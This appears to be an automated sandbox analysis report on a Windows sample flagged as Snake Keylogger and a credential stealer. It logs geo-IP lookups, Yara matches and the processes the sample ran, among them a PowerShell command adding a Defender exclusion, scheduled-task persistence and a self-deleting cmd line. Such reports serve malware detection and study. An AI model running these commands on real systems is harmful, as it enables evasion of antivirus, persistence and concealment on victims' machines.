2025-01-02 19:24:06 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160635 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3DTFJd%2FTAaxK0PZX9o85iDJB%2BkoomzW6qbMiHFqKdI3OzcEMhWIoR9eXVOSxuRoDlhjMBQ9h%2BC3lszJeaRzCjWATE1ebv03%2FTLcgEXs0a4hFtLhgC6%2BjD9Hh%2FHVk1FtrbE9qPxCR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd209ddbed4204-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1707&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1664766&cwnd=234&unsent_bytes=0&cid=2a5382f8badf00f9&ts=157&x=0"
2025-01-02 19:24:06 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49763	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:07 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:24:08 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160637 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VnCrBv9tr%2BQBh%2BqRw1FLQMUDMcxEN6G0A2uXmL%2BKEnlK6mDA5fu3wv%2F3poGAm5wDutvFhPqntQSi3uT3ByNNieCtS%2B4tqnfVTmlke3ho%2F9DvnRX7LAmzvrdIHnz98vinxMMvdTbK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20a639f10fa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1505&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1777236&cwnd=252&unsent_bytes=0&cid=b34a257eb9c78557&ts=160&x=0"
2025-01-02 19:24:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:09 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:09 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160638 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=waOT0Gi5qpE2z%2FBgnyeyU9g74DY3eij2993EsVrHFXQ1Qb%2FipdODygVTFBTc%2BxHGUKhOBSi9f8UIPzWiBqZi%2BbdaAwV7oHzlBf1i4RDvnKhshdRJDCuLbZyljVKprv8Rq7aFXaPd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20ae7fb642d1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2192&min_rtt=2192&rtt_var=1096&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=179769&cwnd=199&unsent_bytes=0&cid=61d80a622893a22d&ts=176&x=0"
2025-01-02 19:24:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49770	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:10 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160639 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93XGxaRlnQgOLzCkgvlqhEETnopwmukSpvdYF%2Fz4Ke5LEkcNkPaZdklivqRuoIBtNMiHfgpZe4omWMbd3aTEN2AWpGa4FbpLMCX36J4bK3EC38TrRJrHDtPSAZ1NxrGW6eq%2Fk1IG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20b70c8b4411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1597&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1744324&cwnd=235&unsent_bytes=0&cid=6b2c56d4b62fafc9&ts=160&x=0"
2025-01-02 19:24:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	14:23:50
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x8e0000
File size:	699'400 bytes
MD5 hash:	7DFF0DEDCCEB56002189A9CE88CF2236
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:23:53
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe"
Imagebase:	0x4d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:23:53
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:23:53
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp"
Imagebase:	0x520000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:23:53
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:23:53
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xe90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:23:55
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:23:56
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe
Imagebase:	0x280000
File size:	699'400 bytes
MD5 hash:	7DFF0DEDCCEB56002189A9CE88CF2236
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:23:58
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp"
Imagebase:	0x520000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:23:58
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:23:58
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x9e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:24:04
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:24:04
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:24:04
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x470000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:24:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7704, Parent PID: 7688

General

Target ID:	17
Start time:	14:24:09
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:24:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x470000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.8%
Total number of Nodes:	376
Total number of Limit Nodes:	26

Executed Functions

Function 0A0E9D90 Relevance: 10.8, Strings: 8, Instructions: 773COMMON

Download Yara Rule

Strings

$dq, xrefs: 0A0EA40C
$dq, xrefs: 0A0EA400
LRdq, xrefs: 0A0EA782
$dq, xrefs: 0A0EA029
$dq, xrefs: 0A0EA0F8
$dq, xrefs: 0A0EA108
LRdq, xrefs: 0A0E9F72
$dq, xrefs: 0A0E9EB6

Memory Dump Source

Source File: 00000000.00000002.1739529980.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0e0000_file.jbxd

Similarity

API ID:
String ID: LRdq$LRdq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3227256636
Opcode ID: 5b0ea8eca0e645dcd8a0f00ed1e802b1cb77d26f6da4ae7eb6e1333f2fe24d0c
Instruction ID: 6c894fd9140a1427a1905c0586b41847c3c97b34852436b9925fce2788b45265
Opcode Fuzzy Hash: 5b0ea8eca0e645dcd8a0f00ed1e802b1cb77d26f6da4ae7eb6e1333f2fe24d0c
Instruction Fuzzy Hash: 3452F571B09258DFCB10CF68C8946BEBBF1AF4A352F0881A6E565DB292D378C841DB51

Function 0A0E1870 Relevance: 6.9, Strings: 5, Instructions: 674
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hhq, xrefs: 0A0E1EC4
Hhq, xrefs: 0A0E2093
Hhq, xrefs: 0A0E1E31
Hhq, xrefs: 0A0E1FD5
Hhq, xrefs: 0A0E1F4B

Memory Dump Source

Source File: 00000000.00000002.1739529980.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0e0000_file.jbxd

Similarity

API ID:
String ID: Hhq$Hhq$Hhq$Hhq$Hhq
API String ID: 0-1427472961
Opcode ID: fdfc9ce04729cb0986491c144064f2911b042fb913c88ea6fa9b41e31ee98511
Instruction ID: 57a7b6ba95913bc9feff18300fba9c825e2a35535d1e8df020b6e6af8c9c6314
Opcode Fuzzy Hash: fdfc9ce04729cb0986491c144064f2911b042fb913c88ea6fa9b41e31ee98511
Instruction Fuzzy Hash: C5424C70E002589FDB54DFA8C89079EBBF2BF88300F1485AAD409AB395DB349D85DF91

Function 01208497 Relevance: 3.9, Strings: 3, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fLn=, xrefs: 012085C8
fLn=, xrefs: 012085AA
LO?B, xrefs: 012084F7

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID: LO?B$fLn=$fLn=
API String ID: 0-1285137076
Opcode ID: 1e5f53cc75afb34134e111eb7f7732b5b63652c3c81716a17660768fd50213e7
Instruction ID: b02b27cf3829487bbeaf9c8fbd9fbad631a25825c6496a1d7aa6e39988f5ea64
Opcode Fuzzy Hash: 1e5f53cc75afb34134e111eb7f7732b5b63652c3c81716a17660768fd50213e7
Instruction Fuzzy Hash: 1A7157B4E21209DFCB04DFE4D9806AEBBB2FF89300F108529D816AB399DB345942CF51

Function 01201387 Relevance: 2.7, Strings: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tedq, xrefs: 01201441
Tedq, xrefs: 0120161A

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID: Tedq$Tedq
API String ID: 0-4137347946
Opcode ID: d7a2263ce7ac242a025c19e01c620c727788162218f196491758e31f8b3eb70a
Instruction ID: 67f33fa9e132c41a9bddb33d3caba916d0c7bab6a55381c5c7f1eda2d0b86389
Opcode Fuzzy Hash: d7a2263ce7ac242a025c19e01c620c727788162218f196491758e31f8b3eb70a
Instruction Fuzzy Hash: 9FA14574E152488FCB09CFA9C9846DEFBB2FF89300F25816AD815AB3A5D7349905CF61

Function 012013D8 Relevance: 2.7, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tedq, xrefs: 01201441
Tedq, xrefs: 0120161A

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID: Tedq$Tedq
API String ID: 0-4137347946
Opcode ID: ded1ff6409436bf37f173049648a6b837e730ee5d5d0f0613de7e6eee0b6b36f
Instruction ID: 53928675b653a683c1a5c74b11db399117c95655b9cd1c96b6a0c2c67a46be34
Opcode Fuzzy Hash: ded1ff6409436bf37f173049648a6b837e730ee5d5d0f0613de7e6eee0b6b36f
Instruction Fuzzy Hash: 9891E474E102198FCB08CFAAC98469EFBB2FF88300F24952AD515BB365D7749905CF54

Function 01200814 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 01209CE5

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 2bdad35aff7511b77163921c7d823acfab247d8aae1d31ff11230d38a2c10563
Instruction ID: 67db875be53c324ccf33792cb2d885176cbb073e928a08a1e83e3d6777655812
Opcode Fuzzy Hash: 2bdad35aff7511b77163921c7d823acfab247d8aae1d31ff11230d38a2c10563
Instruction Fuzzy Hash: 0E4177B9D042589FCF10CFA9D980A9EFBF5BB19310F20A02AE919B7311D375A945CF64

Function 01209C29 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 01209CE5

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d9d0fda82478f2ae610f37afbc8f507f9d504948bba8ea30997e9ed188320643
Instruction ID: dc9dde0ee2a379f20d808ef232ed4bd8ed534bca1cf8c9080251f098038816f6
Opcode Fuzzy Hash: d9d0fda82478f2ae610f37afbc8f507f9d504948bba8ea30997e9ed188320643
